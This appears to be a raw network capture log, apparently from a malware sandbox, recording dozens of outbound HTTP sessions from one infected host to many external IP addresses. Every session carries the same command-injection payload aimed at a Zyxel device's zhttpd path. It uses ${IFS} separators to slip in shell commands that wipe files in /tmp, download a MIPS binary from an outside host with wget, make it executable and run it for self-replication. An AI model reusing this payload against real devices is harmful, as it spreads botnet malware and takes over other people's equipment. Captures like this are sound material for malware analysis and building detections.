                                                Jan 12, 2024 18:24:46.108620882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6994192.168.2.1342922217.52.217.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108665943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6995192.168.2.1348564133.46.20.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108706951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6996192.168.2.135275450.55.173.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108737946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6997192.168.2.1334978190.51.9.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108767033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6998192.168.2.135156693.238.214.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108817101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6999192.168.2.135640218.208.175.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108851910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7000192.168.2.1356546168.133.96.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108880997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7001192.168.2.135423240.56.63.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108918905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7002192.168.2.1358962165.106.123.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108968019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7003192.168.2.134980839.41.244.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109019041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7004192.168.2.133744817.145.90.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109061956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7005192.168.2.1343944198.210.250.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109095097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7006192.168.2.1333774145.128.107.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109134912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7007192.168.2.133986480.240.8.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109163046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7008192.168.2.1360720148.84.105.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109215975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7009192.168.2.133968682.210.202.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109260082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7010192.168.2.1340304104.91.155.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109306097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7011192.168.2.1354382135.27.29.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109359026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7012192.168.2.135115643.66.201.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109390974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7013192.168.2.1335780186.185.209.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109426975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7014192.168.2.1354760188.86.249.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109455109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7015192.168.2.1334418177.11.149.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109476089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7016192.168.2.1338464173.205.253.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109520912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7017192.168.2.135061472.231.17.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109575033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7018192.168.2.1349050216.226.59.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109608889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7019192.168.2.1339856170.10.53.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109663010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7020192.168.2.133433813.183.127.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109689951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7021192.168.2.133545662.70.232.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109747887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7022192.168.2.1334378203.193.194.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109747887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7023192.168.2.135553659.85.69.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109798908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7024192.168.2.1340978132.88.91.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109843969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7025192.168.2.1354542180.175.87.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109874964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7026192.168.2.1356484217.215.75.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109916925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7027192.168.2.1351784153.115.108.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.109960079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7028192.168.2.133375673.250.201.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110003948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7029192.168.2.1338214133.143.14.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110049009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7030192.168.2.1334224201.210.162.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110075951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7031192.168.2.1357302170.11.12.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110116005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7032192.168.2.1337188206.42.96.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110146999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7033192.168.2.133838014.189.18.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110169888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7034192.168.2.1352002163.13.196.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110225916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7035192.168.2.1340878134.229.220.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110265017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7036192.168.2.1344430220.254.160.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110311985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7037192.168.2.1340536203.218.207.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110332966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7038192.168.2.134784672.144.147.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110394001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7039192.168.2.134037454.116.89.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110439062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7040192.168.2.133862482.46.168.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110476017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7041192.168.2.135018295.71.84.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110526085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7042192.168.2.1339774163.3.105.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110563040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7043192.168.2.135233224.116.244.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110610008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7044192.168.2.134941623.214.32.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110650063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7045192.168.2.1355730149.221.205.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110680103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7046192.168.2.135438695.202.66.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110738039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7047192.168.2.1343626218.115.234.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110765934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7048192.168.2.1358182158.185.99.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110812902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7049192.168.2.13483261.18.67.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110842943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7050192.168.2.134265632.217.101.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110891104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7051192.168.2.13496901.44.5.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110913038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7052192.168.2.1344380168.159.70.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.110964060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7053192.168.2.1335048166.205.185.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111011028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7054192.168.2.1340978186.196.159.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111047029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7055192.168.2.13453682.113.177.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111095905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7056192.168.2.1334550220.18.20.43443
                                                TimestampBytes transferredDirectionData
